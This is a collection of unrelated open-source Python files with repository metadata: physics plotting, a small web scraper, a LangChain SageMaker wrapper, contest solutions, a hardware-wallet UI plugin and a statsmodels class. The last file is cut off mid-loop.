b9895287e59d4d083df29a36b630b6abae9c53eb | 2d4d0b293a96267dde951f41ad155e895722b214 | /JEC/python/L2res/occ2d_draw.py | 481732bdd9b9aee823e559d76b7ac6d13697726d | [] | no_license | gqlcms/JetMET | 343f7df63d6a96edde0d618d663ec506ed1f1503 | d1390138d17312eac353093602436c6573ae2216 | refs/heads/master | 2020-07-29T11:22:11.111026 | 2019-05-09T12:44:46 | 2019-05-09T12:44:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,862 | py | #!/usr/bin/env python
''' Analysis script for L3 residuals (Z balancing)
'''
#
# Standard imports and batch mode
#
import ROOT
ROOT.gROOT.SetBatch(True)
import itertools
import os
from math import sqrt, cos, sin, pi, atan2, sinh
from RootTools.core.standard import *
from JetMET.tools.user import plot_directory as user_plot_directory
from JetMET.tools.helpers import deltaPhi, deltaR
# Object selection
from JetMET.tools.objectSelection import getFilterCut, getJets, jetVars
#
# Arguments
#
import argparse
argParser = argparse.ArgumentParser(description = "Argument parser")
argParser.add_argument('--logLevel', action='store', default='INFO', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'], help="Log level for logging" )
argParser.add_argument('--triggers', action='store', default='noTriggers', nargs='?', choices=['DiPFJetAve', 'DiPFJetAve_HFJEC', 'PFJet', 'exclPFJet', 'exclDiPFJetAve', 'exclDiPFJetAveHFJEC', 'noTriggers'], help="trigger suite" )
argParser.add_argument('--ptBin', action='store', default=(163, 230), type = int, nargs=2, help="tag jet pt bin" )
argParser.add_argument('--etaSign', action='store', default=0 , type = int, choices = [-1,0,+1], help="sign of probe jet eta." )
argParser.add_argument('--era', action='store', default='Run2016H', nargs='?', choices=['Run2016', 'Run2016BCD', 'Run2016EFearly', 'Run2016FlateG', 'Run2016H', 'Run2016_18Apr', 'Run2016BCD_18Apr', 'Run2016EFearly_18Apr', 'Run2016FlateG_18Apr', 'Run2016H_18Apr', 'Run2016B_07Aug17', 'Run2016C_07Aug17', 'Run2016F_07Aug17', 'Run2016G_07Aug17', 'Run2016H_07Aug17'], help="era" )
argParser.add_argument('--small', action='store_true', help='Run only on a small subset of the data?')#, default = True)
argParser.add_argument('--cleaned', action='store_true', help='Apply jet cleaning in data')#, default = True)
argParser.add_argument('--bad', action='store_true', help='Cut on phEF*pT>300')#, default = True)
argParser.add_argument('--plot_directory', action='store', default='JEC/L2res_2D_v11', help="subdirectory for plots")
args = argParser.parse_args()
if args.cleaned:
args.plot_directory += '_cleaned'
if args.bad:
args.plot_directory += '_bad'
if args.small:
args.plot_directory += '_small'
plot_directory = os.path.join( user_plot_directory, args.plot_directory, args.era, args.triggers )
# Lumi for MC
lumi = 35.9
# DrawLatex objects for plots
tex = ROOT.TLatex()
tex.SetNDC()
tex.SetTextSize(0.04)
tex.SetTextAlign(11) # align right
def drawObjects( dataMCScale, lumi ):
lines = [
#(0.15, 0.95, args.era),
(0.45, 0.95, 'L=%3.1f fb{}^{-1} (13 TeV) Scale %3.2f'% ( lumi, dataMCScale ) )
]
return [tex.DrawLatex(*l) for l in lines]
## Formatting for 1D plots
def draw2DPlots(plots, dataMCScale):
for log in [ True, False]:
plot_directory_ = os.path.join(plot_directory, ("log" if log else "lin") )
for plot in plots:
draw_obj = getattr(plot, "drawObjects", [])
p_drawObjects = []
for o in draw_obj:
if type(o)==tuple:
p_drawObjects.append( tex.DrawLatex(*o) )
else:
p_drawObjects.append( o )
plotting.draw2D(plot,
plot_directory = plot_directory_,
logX = False, logY = False,
drawObjects = drawObjects( dataMCScale , lumi ) + p_drawObjects
)
#
# Logger
#
import JetMET.tools.logger as logger
import RootTools.core.logger as logger_rt
logger = logger.get_logger( args.logLevel, logFile = None)
logger_rt = logger_rt.get_logger(args.logLevel, logFile = None)
from JetMET.JEC.samples.L2res_skim import *
if args.era == 'Run2016':
data = JetHT_Run2016
elif args.era == 'Run2016BCD':
data = JetHT_Run2016BCD
elif args.era == 'Run2016EFearly':
data = JetHT_Run2016EFearly
elif args.era == 'Run2016FlateG':
data = JetHT_Run2016FlateG
elif args.era == 'Run2016H':
data = JetHT_Run2016H
elif args.era == 'Run2016_18Apr':
data = JetHT_Run2016_18Apr
elif args.era == 'Run2016BCD_18Apr':
data = JetHT_Run2016BCD_18Apr
elif args.era == 'Run2016EFearly_18Apr':
data = JetHT_Run2016EFearly_18Apr
elif args.era == 'Run2016FlateG_18Apr':
data = JetHT_Run2016FlateG_18Apr
elif args.era == 'Run2016H_18Apr':
data = JetHT_Run2016H_18Apr
elif args.era == 'Run2016B_07Aug17':
data = JetHT_Run2016B_07Aug17
elif args.era == 'Run2016C_07Aug17':
data = JetHT_Run2016C_07Aug17
elif args.era == 'Run2016F_07Aug17':
data = JetHT_Run2016F_07Aug17
elif args.era == 'Run2016G_07Aug17':
data = JetHT_Run2016G_07Aug17
elif args.era == 'Run2016H_07Aug17':
data = JetHT_Run2016H_07Aug17
if args.triggers == 'noTriggers':
triggers = []
elif args.triggers=='DiPFJetAve':
triggers = [
"HLT_DiPFJetAve40",
"HLT_DiPFJetAve60",
"HLT_DiPFJetAve80",
"HLT_DiPFJetAve140",
"HLT_DiPFJetAve200",
"HLT_DiPFJetAve260",
"HLT_DiPFJetAve320",
"HLT_DiPFJetAve400",
"HLT_DiPFJetAve500",
]
elif args.triggers == 'PFJet':
triggers = [
"HLT_PFJet40",
"HLT_PFJet60",
"HLT_PFJet80",
"HLT_PFJet140",
"HLT_PFJet200",
"HLT_PFJet260",
"HLT_PFJet320",
"HLT_PFJet400",
"HLT_PFJet450",
"HLT_PFJet500",
]
elif args.triggers == 'DiPFJetAve_HFJEC':
triggers = [
"HLT_DiPFJetAve60_HFJEC",
"HLT_DiPFJetAve80_HFJEC",
"HLT_DiPFJetAve100_HFJEC",
"HLT_DiPFJetAve160_HFJEC",
"HLT_DiPFJetAve220_HFJEC",
"HLT_DiPFJetAve300_HFJEC",
]
elif args.triggers == 'exclPFJet':
from JetMET.JEC.L2res.thresholds import exclPFJets
triggers = [ exclPFJets ]
elif args.triggers == 'exclDiPFJetAve':
from JetMET.JEC.L2res.thresholds import exclDiPFJetAve
triggers = [ exclDiPFJetAve ]
elif args.triggers == 'exclDiPFJetAveHFJEC':
from JetMET.JEC.L2res.thresholds import exclDiPFJetAveHFJEC
triggers = [ exclDiPFJetAveHFJEC ]
else:
triggers = [ args.triggers ]
samples = data
from JetMET.JEC.L2res.jet_cleaning import jet_cleaning
if len(triggers)>0:
data.addSelectionString( "("+"||".join(triggers)+")")
if args.cleaned:
data.addSelectionString( jet_cleaning )
selection = [
# ("btb", "cos(Jet_phi[tag_jet_index] - Jet_phi[probe_jet_index]) < cos(2.7)"),
# ("a30", "alpha<0.3"),
("EGM", "A>0.4&&Jet_phEF[probe_jet_index]>0.8")
]
if args.bad:
selection.append( ("bad", "Jet_phEF[probe_jet_index]*Jet_pt[probe_jet_index]>250") )
#tag_jet_bin = (163, 230)
#probe_jet_abs_eta_bin = (2.853, 2.964 )
tag_jet_bin = tuple(args.ptBin)
if args.etaSign == -1:
probe_jet_eta_string = "-Jet_eta[probe_jet_index]"
eta_string = "negeta"
eta_tex_string = "#eta<0"
elif args.etaSign == +1:
probe_jet_eta_string = "Jet_eta[probe_jet_index]"
eta_string = "poseta"
eta_tex_string = "#eta>0"
elif args.etaSign == 0:
probe_jet_eta_string = "abs(Jet_eta[probe_jet_index])"
eta_string = "alleta"
eta_tex_string = "(both endcaps)"
# kinematic selection on tag & probe jet
kinSelectionString = "%f<Jet_pt[tag_jet_index]&&Jet_pt[tag_jet_index]<%f "% ( tag_jet_bin[0], tag_jet_bin[1] )
logger.info( "Jet selection: %s", kinSelectionString )
data.addSelectionString( "&&".join(c[1] for c in selection))
data.addSelectionString( kinSelectionString )
if args.small:
data.reduceFiles( to = 1 )
#colors = [ j+1 for j in range(0,9) ] + [ j+31 for j in range(9,18) ]
variableString = "1/sinh(%s)*sin(Jet_phi[probe_jet_index]):1/sinh(%s)*cos(Jet_phi[probe_jet_index])" % ( probe_jet_eta_string, probe_jet_eta_string )
weightString = "met_chsPt*weight*(%s>0)"%probe_jet_eta_string
logger.info( "Get plot with %s, and weight %s", variableString, weightString )
h_data = data.get2DHistoFromDraw(variableString = variableString, binning = [60, -0.3, 0.3, 60, -0.3, 0.3], weightString=weightString)
circles = [ ROOT.TArc(0,0,1./sinh(eta)) for eta in [2.5, 3] ]
for c in circles:
c.SetFillStyle(0)
plot = Plot2D.fromHisto( name = '2D_%s_pt_%i_%i' % ( eta_string, tag_jet_bin[0], tag_jet_bin[1]),
# [ [ h_MC ] ] + histos_data, texX = texX, texY = "Number of Events"
histos = [[ h_data ]], texX = "X (/Z)", texY = "Y (/Z)"
)
plot.drawObjects = circles
plot.drawObjects += [
(0.17, 0.86, args.era + ' ' + eta_tex_string),
(0.17, 0.81, '%i #leq p_{T,tag} < %i'% tag_jet_bin ),
(0.59, 0.41, '|#eta| = 3' ),
(0.65, 0.35, '|#eta| = 2.5' ),
]
draw2DPlots( [plot], 1.)
| [
"[email protected]"
] | |
d04872bac0a950de742027fee0e7b9b5f0e2ab53 | 544d4f57945a08cb382b1ef04ae73fb6eaccfb29 | /105.py | 9c481c8d2568ed9f326e517c84e96b9ec4d3b0b3 | [
"LicenseRef-scancode-unicode",
"ICU",
"NAIST-2003",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | rzhang1654/pyco | 7ea06a49cb169b4f70bf5d832ed39af5e416ee60 | 80a23c591da0f36f240f644ce8799fe8f9f5ed98 | refs/heads/master | 2023-05-25T11:44:14.027525 | 2021-06-02T14:57:17 | 2021-06-02T14:57:17 | 373,204,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | #!/usr/bin/env python
#
from atexit import register
from re import compile
from threading import Thread
from time import ctime
from urllib import urlopen as uopen
REGEX = compile(r'<script type="(.+?)">')
EXELON = 'https://www.exeloncorp.com/leadership-and-governance'
PAGEs = {
'ethics-and-conduct': 'ethics and conduct',
'executive-profiles': 'executive profiles',
'governance-overview': 'governance overview',
}
def getScript(title):
page = uopen('%s%s' % (EXELON,title))
data = page.read()
page.close()
return REGEX.findall(data)[0]
def _showScript(title):
print '- %s is %s' % (PAGEs[title], getScript(title))
def _main():
print 'At', ctime(), 'on Exelon ...'
for title in PAGEs:
Thread(target=_showScript, args=(title,)).start()
@register
def _atexit():
print 'all DONE at:', ctime()
if __name__ == '__main__':
_main()
| [
"[email protected]"
] | |
81120867431d79bbfad20b6629306fb294a78aea | e5654e71ad4f043bb28105c3b6f3cd833e1c52dc | /openai/venv/lib/python3.10/site-packages/langchain/embeddings/sagemaker_endpoint.py | e1371a7d99936cbd102ccb6ba13e593ba23abc8a | [] | no_license | henrymendez/garage | 0b795f020a68fe2d349b556fb8567f6b96488ed5 | b7aaa920a52613e3f1f04fa5cd7568ad37302d11 | refs/heads/master | 2023-07-19T20:16:02.792007 | 2023-07-07T16:58:15 | 2023-07-07T16:58:15 | 67,760,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,006 | py | """Wrapper around Sagemaker InvokeEndpoint API."""
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Extra, root_validator
from langchain.embeddings.base import Embeddings
from langchain.llms.sagemaker_endpoint import ContentHandlerBase
class SagemakerEndpointEmbeddings(BaseModel, Embeddings):
"""Wrapper around custom Sagemaker Inference Endpoints.
To use, you must supply the endpoint name from your deployed
Sagemaker model & the region where it is deployed.
To authenticate, the AWS client uses the following methods to
automatically load credentials:
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
If a specific credential profile should be used, you must pass
the name of the profile from the ~/.aws/credentials file that is to be used.
Make sure the credentials / roles used have the required policies to
access the Sagemaker endpoint.
See: https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html
"""
"""
Example:
.. code-block:: python
from langchain.embeddings import SagemakerEndpointEmbeddings
endpoint_name = (
"my-endpoint-name"
)
region_name = (
"us-west-2"
)
credentials_profile_name = (
"default"
)
se = SagemakerEndpointEmbeddings(
endpoint_name=endpoint_name,
region_name=region_name,
credentials_profile_name=credentials_profile_name
)
"""
client: Any #: :meta private:
endpoint_name: str = ""
"""The name of the endpoint from the deployed Sagemaker model.
Must be unique within an AWS Region."""
region_name: str = ""
"""The aws region where the Sagemaker model is deployed, eg. `us-west-2`."""
credentials_profile_name: Optional[str] = None
"""The name of the profile in the ~/.aws/credentials or ~/.aws/config files, which
has either access keys or role information specified.
If not specified, the default credential profile or, if on an EC2 instance,
credentials from IMDS will be used.
See: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
"""
content_handler: ContentHandlerBase
"""The content handler class that provides an input and
output transform functions to handle formats between LLM
and the endpoint.
"""
"""
Example:
.. code-block:: python
from langchain.llms.sagemaker_endpoint import ContentHandlerBase
class ContentHandler(ContentHandlerBase):
content_type = "application/json"
accepts = "application/json"
def transform_input(self, prompt: str, model_kwargs: Dict) -> bytes:
input_str = json.dumps({prompt: prompt, **model_kwargs})
return input_str.encode('utf-8')
def transform_output(self, output: bytes) -> str:
response_json = json.loads(output.read().decode("utf-8"))
return response_json[0]["generated_text"]
"""
model_kwargs: Optional[Dict] = None
"""Key word arguments to pass to the model."""
endpoint_kwargs: Optional[Dict] = None
"""Optional attributes passed to the invoke_endpoint
function. See `boto3`_. docs for more info.
.. _boto3: <https://boto3.amazonaws.com/v1/documentation/api/latest/index.html>
"""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that AWS credentials to and python package exists in environment."""
try:
import boto3
try:
if values["credentials_profile_name"] is not None:
session = boto3.Session(
profile_name=values["credentials_profile_name"]
)
else:
# use default credentials
session = boto3.Session()
values["client"] = session.client(
"sagemaker-runtime", region_name=values["region_name"]
)
except Exception as e:
raise ValueError(
"Could not load credentials to authenticate with AWS client. "
"Please check that credentials in the specified "
"profile name are valid."
) from e
except ImportError:
raise ValueError(
"Could not import boto3 python package. "
"Please install it with `pip install boto3`."
)
return values
def _embedding_func(self, texts: List[str]) -> List[float]:
"""Call out to SageMaker Inference embedding endpoint."""
# replace newlines, which can negatively affect performance.
texts = list(map(lambda x: x.replace("\n", " "), texts))
_model_kwargs = self.model_kwargs or {}
_endpoint_kwargs = self.endpoint_kwargs or {}
body = self.content_handler.transform_input(texts, _model_kwargs)
content_type = self.content_handler.content_type
accepts = self.content_handler.accepts
# send request
try:
response = self.client.invoke_endpoint(
EndpointName=self.endpoint_name,
Body=body,
ContentType=content_type,
Accept=accepts,
**_endpoint_kwargs,
)
except Exception as e:
raise ValueError(f"Error raised by inference endpoint: {e}")
return self.content_handler.transform_output(response["Body"])
def embed_documents(
self, texts: List[str], chunk_size: int = 64
) -> List[List[float]]:
"""Compute doc embeddings using a SageMaker Inference Endpoint.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size defines how many input texts will
be grouped together as request. If None, will use the
chunk size specified by the class.
Returns:
List of embeddings, one for each text.
"""
results = []
_chunk_size = len(texts) if chunk_size > len(texts) else chunk_size
for i in range(0, len(texts), _chunk_size):
response = self._embedding_func(texts[i : i + _chunk_size])
results.append(response)
return results
def embed_query(self, text: str) -> List[float]:
"""Compute query embeddings using a SageMaker inference endpoint.
Args:
text: The text to embed.
Returns:
Embeddings for the text.
"""
return self._embedding_func([text])
| [
"[email protected]"
] | |
c9e58e81a27a870849d3bfed9fa9d0ddacf18134 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/abc038/D/4502471.py | 1539cc5c3366975fe7df695b0a53f39763ae4186 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | import sys
import bisect
input=sys.stdin.readline
N=int(input())
data=[tuple(map(int,input().split())) for _ in range(N)]
data.sort()
data2=[]
now=[]
for d in data:
if len(now)==0:
now.append(d)
continue
if now[0][0]!=d[0]:
now.sort(key=lambda x:x[1],reverse=True)
data2+=now
now=[d]
elif now[0][0]==d[0]:
now.append(d)
now.sort(key=lambda x:x[1],reverse=True)
data2+=now
data=data2
inf=float('inf')
dp=[inf]*(len(data)+1)
dp[0]=0
dp2=[(inf,inf)]*(len(data)+1)
dp2[0]=(0,0)
for i in range(len(data)):
idx=bisect.bisect_left(dp,data[i][1])
if dp2[idx-1][0]<data[i][0] and data[i][1]<dp2[idx][1]:
dp[idx]=data[i][1]
dp2[idx]=data[i]
print(len([i for i in dp if i<inf])-1) | [
"[email protected]"
] | |
acf6fb9f47e54f8b0c090b7fe6dc50e0a77e2318 | e634f90bc999a2903c92f66384a867a474b40d9c | /Source/Main.py | f6c46809d31de7e9aa6b1e9aee2033be4f65fe5d | [
"MIT"
] | permissive | Dmunch04/Plistr | 69f7217fbea24e48870667c8507845ddd1a63547 | 39d70e3b9f1a827d48a6a951617da0892978515c | refs/heads/master | 2020-07-15T21:16:55.539440 | 2019-09-01T14:27:04 | 2019-09-01T14:27:04 | 205,650,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | from Window import Window
from Helpers import Loader
class Plistr:
def __init__ (self, Filename):
self.Filename = Filename
self.Items = Loader.LoadFile (self.Filename)
self.Window = Window (Filename)
def Run (self):
self.Window.Run (self.Items)
| [
"[email protected]"
] | |
b860558d9525b80e85652f2e33d5aa57e3fd91cc | 0cab535ec5b00aa1f99614062ac53017bc048333 | /tensorflow_graphics/io/__init__.py | 53ac26a35cb4db9576f1689a51a5b7be41d19f55 | [
"Apache-2.0"
] | permissive | yangbooom/graphics | d3eb6e4940ee624b64d4d87af9de6c7e2c6d924a | 2a759c0981372cc58e51e77ba939b00693cb9fdf | refs/heads/master | 2022-07-13T11:12:33.204592 | 2020-05-17T00:23:02 | 2020-05-17T00:23:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""`tensorflow_graphics.io` module."""
# pylint: disable=g-import-not-at-top
from tensorflow_graphics.util.doc import _import_tfg_docs
if _import_tfg_docs():
from tensorflow.io import triangle_mesh
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.rendering.reflectance.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
| [
"[email protected]"
] | |
7fede01bad23361cbb201f9ae03d1b537a916785 | 5068bc927a7fff73923ce95862ff70120160c491 | /electrum_axe/plugins/ledger/qt.py | 2c36c1397995c78a133b363be3051db888fc4fa6 | [
"MIT"
] | permissive | AXErunners/electrum-axe | cdbce2dbb92e23e32e9f9b733ae9f65f51c0ae9f | 7ef05088c0edaf0688fb167df353d6da619ebf2f | refs/heads/master | 2021-04-03T09:40:37.109317 | 2020-08-27T16:53:18 | 2020-08-27T16:53:18 | 124,705,752 | 336 | 75 | MIT | 2020-10-17T18:30:25 | 2018-03-10T23:00:48 | Python | UTF-8 | Python | false | false | 2,709 | py | from functools import partial
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QInputDialog, QLabel, QVBoxLayout, QLineEdit
from electrum_axe.i18n import _
from electrum_axe.plugin import hook
from electrum_axe.wallet import Standard_Wallet
from electrum_axe.gui.qt.util import WindowModalDialog
from .ledger import LedgerPlugin
from ..hw_wallet.qt import QtHandlerBase, QtPluginBase
from ..hw_wallet.plugin import only_hook_if_libraries_available
class Plugin(LedgerPlugin, QtPluginBase):
icon_unpaired = "ledger_unpaired.png"
icon_paired = "ledger.png"
def create_handler(self, window):
return Ledger_Handler(window)
@only_hook_if_libraries_available
@hook
def receive_menu(self, menu, addrs, wallet):
if type(wallet) is not Standard_Wallet:
return
keystore = wallet.get_keystore()
if type(keystore) == self.keystore_class and len(addrs) == 1:
def show_address():
keystore.thread.add(partial(self.show_address, wallet, addrs[0]))
menu.addAction(_("Show on Ledger"), show_address)
class Ledger_Handler(QtHandlerBase):
setup_signal = pyqtSignal()
auth_signal = pyqtSignal(object)
def __init__(self, win):
super(Ledger_Handler, self).__init__(win, 'Ledger')
self.setup_signal.connect(self.setup_dialog)
self.auth_signal.connect(self.auth_dialog)
def word_dialog(self, msg):
response = QInputDialog.getText(self.top_level_window(), "Ledger Wallet Authentication", msg, QLineEdit.Password)
if not response[1]:
self.word = None
else:
self.word = str(response[0])
self.done.set()
def message_dialog(self, msg):
self.clear_dialog()
self.dialog = dialog = WindowModalDialog(self.top_level_window(), _("Ledger Status"))
l = QLabel(msg)
vbox = QVBoxLayout(dialog)
vbox.addWidget(l)
dialog.show()
def auth_dialog(self, data):
try:
from .auth2fa import LedgerAuthDialog
except ImportError as e:
self.message_dialog(str(e))
return
dialog = LedgerAuthDialog(self, data)
dialog.exec_()
self.word = dialog.pin
self.done.set()
def get_auth(self, data):
self.done.clear()
self.auth_signal.emit(data)
self.done.wait()
return self.word
def get_setup(self):
self.done.clear()
self.setup_signal.emit()
self.done.wait()
return
def setup_dialog(self):
self.show_error(_('Initialization of Ledger HW devices is currently disabled.'))
| [
"[email protected]"
] | |
7b5d81cbcf4171c2438e06c851ff4e7d2d6a0401 | 76a8ea60480331f0f61aeb61de55be9a6270e733 | /downloadable-site-packages/statsmodels/sandbox/rls.py | 412cc4d05051951d88945554d1d310bacbbc9c20 | [
"MIT"
] | permissive | bhagyas/Pyto | cd2ec3f35bec703db4ac29b56d17abc4bf03e375 | 907024a9b3e04a2a9de54976778c0e1a56b7b83c | refs/heads/master | 2022-11-19T13:05:07.392454 | 2020-07-21T17:33:39 | 2020-07-21T17:33:39 | 281,886,535 | 2 | 0 | MIT | 2020-07-23T07:48:03 | 2020-07-23T07:48:02 | null | UTF-8 | Python | false | false | 5,136 | py | """Restricted least squares
from pandas
License: Simplified BSD
"""
import numpy as np
from statsmodels.regression.linear_model import GLS, RegressionResults
class RLS(GLS):
"""
Restricted general least squares model that handles linear constraints
Parameters
----------
endog: array_like
n length array containing the dependent variable
exog: array_like
n-by-p array of independent variables
constr: array_like
k-by-p array of linear constraints
param (0.): array_like or scalar
p-by-1 array (or scalar) of constraint parameters
sigma (None): scalar or array_like
The weighting matrix of the covariance. No scaling by default (OLS).
If sigma is a scalar, then it is converted into an n-by-n diagonal
matrix with sigma as each diagonal element.
If sigma is an n-length array, then it is assumed to be a diagonal
matrix with the given sigma on the diagonal (WLS).
Notes
-----
endog = exog * beta + epsilon
weights' * constr * beta = param
See Greene and Seaks, "The Restricted Least Squares Estimator:
A Pedagogical Note", The Review of Economics and Statistics, 1991.
"""
def __init__(self, endog, exog, constr, param=0., sigma=None):
N, Q = exog.shape
constr = np.asarray(constr)
if constr.ndim == 1:
K, P = 1, constr.shape[0]
else:
K, P = constr.shape
if Q != P:
raise Exception('Constraints and design do not align')
self.ncoeffs = Q
self.nconstraint = K
self.constraint = constr
if np.isscalar(param) and K > 1:
param = np.ones((K,)) * param
self.param = param
if sigma is None:
sigma = 1.
if np.isscalar(sigma):
sigma = np.ones(N) * sigma
sigma = np.squeeze(sigma)
if sigma.ndim == 1:
self.sigma = np.diag(sigma)
self.cholsigmainv = np.diag(np.sqrt(sigma))
else:
self.sigma = sigma
self.cholsigmainv = np.linalg.cholesky(np.linalg.pinv(self.sigma)).T
super(GLS, self).__init__(endog, exog)
_rwexog = None
@property
def rwexog(self):
"""Whitened exogenous variables augmented with restrictions"""
if self._rwexog is None:
P = self.ncoeffs
K = self.nconstraint
design = np.zeros((P + K, P + K))
design[:P, :P] = np.dot(self.wexog.T, self.wexog) #top left
constr = np.reshape(self.constraint, (K, P))
design[:P, P:] = constr.T #top right partition
design[P:, :P] = constr #bottom left partition
design[P:, P:] = np.zeros((K, K)) #bottom right partition
self._rwexog = design
return self._rwexog
_inv_rwexog = None
@property
def inv_rwexog(self):
"""Inverse of self.rwexog"""
if self._inv_rwexog is None:
self._inv_rwexog = np.linalg.inv(self.rwexog)
return self._inv_rwexog
_rwendog = None
@property
def rwendog(self):
"""Whitened endogenous variable augmented with restriction parameters"""
if self._rwendog is None:
P = self.ncoeffs
K = self.nconstraint
response = np.zeros((P + K,))
response[:P] = np.dot(self.wexog.T, self.wendog)
response[P:] = self.param
self._rwendog = response
return self._rwendog
_ncp = None
@property
def rnorm_cov_params(self):
"""Parameter covariance under restrictions"""
if self._ncp is None:
P = self.ncoeffs
self._ncp = self.inv_rwexog[:P, :P]
return self._ncp
_wncp = None
@property
def wrnorm_cov_params(self):
"""
Heteroskedasticity-consistent parameter covariance
Used to calculate White standard errors.
"""
if self._wncp is None:
df = self.df_resid
pred = np.dot(self.wexog, self.coeffs)
eps = np.diag((self.wendog - pred) ** 2)
sigmaSq = np.sum(eps)
pinvX = np.dot(self.rnorm_cov_params, self.wexog.T)
self._wncp = np.dot(np.dot(pinvX, eps), pinvX.T) * df / sigmaSq
return self._wncp
_coeffs = None
@property
def coeffs(self):
"""Estimated parameters"""
if self._coeffs is None:
betaLambda = np.dot(self.inv_rwexog, self.rwendog)
self._coeffs = betaLambda[:self.ncoeffs]
return self._coeffs
def fit(self):
rncp = self.wrnorm_cov_params
lfit = RegressionResults(self, self.coeffs, normalized_cov_params=rncp)
return lfit
if __name__=="__main__":
import statsmodels.api as sm
dta = np.genfromtxt('./rlsdata.txt', names=True)
design = np.column_stack((dta['Y'],dta['Y']**2,dta[['NE','NC','W','S']].view(float).reshape(dta.shape[0],-1)))
design = sm.add_constant(design, prepend=True)
rls_mod = RLS(dta['G'],design, constr=[0,0,0,1,1,1,1])
rls_fit = rls_mod.fit()
print(rls_fit.params)
| [
"[email protected]"
] | |
8b7311824ab9a23ac88a7ac5fed9d86293761a1f | 6d5d161269e66345a32e0e221f2dbce2a07c742a | /async_sched/server/messages.py | afca8f5818cc66f2f69f7051f2ae055bd29a5126 | [
"MIT"
] | permissive | justengel/async_sched | d286c79eb6a705769aa8e59da7508d5995acb523 | f980722d51d15025522b2265426b0188ff368418 | refs/heads/master | 2022-11-07T18:24:50.843013 | 2020-07-01T02:39:55 | 2020-07-01T02:39:55 | 268,154,385 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | from typing import List
from serial_json import DataClass, field
from ..schedule import Schedule
__all__ = ['DataClass', 'Message', 'Error', 'Quit', 'Update', 'RunCommand', 'ScheduleCommand',
'RunningSchedule', 'ListSchedules', 'StopSchedule']
class Message(DataClass):
message: str
class Error(DataClass):
message: str
class Quit(DataClass):
pass
class Update(DataClass):
module_name: str = ''
class RunCommand(DataClass):
callback_name: str
args: tuple = field(default_factory=tuple)
kwargs: dict = field(default_factory=dict)
class ScheduleCommand(DataClass):
name: str
schedule: Schedule
callback_name: str
args: tuple = field(default_factory=tuple)
kwargs: dict = field(default_factory=dict)
class RunningSchedule(DataClass):
name: str
schedule: Schedule
class ListSchedules(DataClass):
schedules: List[RunningSchedule] = field(default_factory=list)
class StopSchedule(DataClass):
name: str
| [
"[email protected]"
] | |
c925362f7a177e0811dfb0b9035d7ffefbf1ec34 | 5c6ccc082d9d0d42a69e22cfd9a419a5b87ff6cd | /coursera/pythonHse/fourth/4.py | b721d875cacc3f42d7207d20fca81d8db4118054 | [] | no_license | kersky98/stud | 191c809bacc982c715d9610be282884a504d456d | d395a372e72aeb17dfad5c72d46e84dc59454410 | refs/heads/master | 2023-03-09T20:47:25.082673 | 2023-03-01T08:28:32 | 2023-03-01T08:28:32 | 42,979,807 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,342 | py | # Даны два действительных числа x и y. Проверьте, принадлежит ли точка с
# координатами (x,y) заштрихованному квадрату (включая его границу). Если
# точка принадлежит квадрату, выведите слово YES, иначе выведите слово NO.
# На рисунке сетка проведена с шагом 1.
# Решение должно содержать функцию IsPointInSquare(x, y), возвращающую True,
# если точка принадлежит квадрату и False, если не принадлежит. Основная
# программа должна считать координаты точки, вызвать функцию IsPointInSquare
# и в зависимости от возвращенного значения вывести на экран необходимое
# сообщение. Функция IsPointInSquare не должна содержать инструкцию if.
import sys
x = float(input())
y = float(input())
e = sys.float_info.epsilon
def IsPointInSquare(x, y):
res = -1-e < x < 1+e and -1-e < y < 1+e
return res
if IsPointInSquare(x, y):
print('YES')
else:
print('NO')
| [
"[email protected]"
] | |
d603fc4e9d43b4652a8ac0e851fac084cd7232b0 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_1/r4ghu/count.py | 41bfd1280434461d73ff3977ca2f3160ac163ca2 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 688 | py | input = open('input.txt','r')
print 'Name of the file:', input.name
results = []
T = int(input.readline())
for t in range(T):
dic = {}
l = []
n = int(input.readline())
if n==0:
results.append('INSOMNIA')
for i in range(1,25*n):
p = list(str(i*n))
for j in p:
